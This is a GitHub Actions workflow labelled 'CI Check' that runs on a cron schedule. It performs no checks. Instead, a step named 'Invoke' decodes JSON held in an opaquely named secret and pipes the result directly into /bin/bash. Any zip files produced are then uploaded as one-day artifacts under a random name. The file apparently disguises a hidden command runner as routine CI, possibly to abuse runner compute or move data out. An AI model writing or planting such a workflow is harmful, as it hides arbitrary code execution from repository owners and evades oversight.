name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '7 0,6,12,18 * * *'
jobs:
  pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          vo39: ${{ secrets.vo39 }}
        run: |
          printf '%s' "$vo39" | jq -r .hbevj25 | /bin/bash
          printf '%s' "$w50501" | jq -r .xw3 | /bin/bash

      - name: Persist output
        if: ${{ always() }}
        uses: actions/upload-artifact@v4
        with:
          name: rj08mWyy
          path: "*.zip"
          retention-days: 1
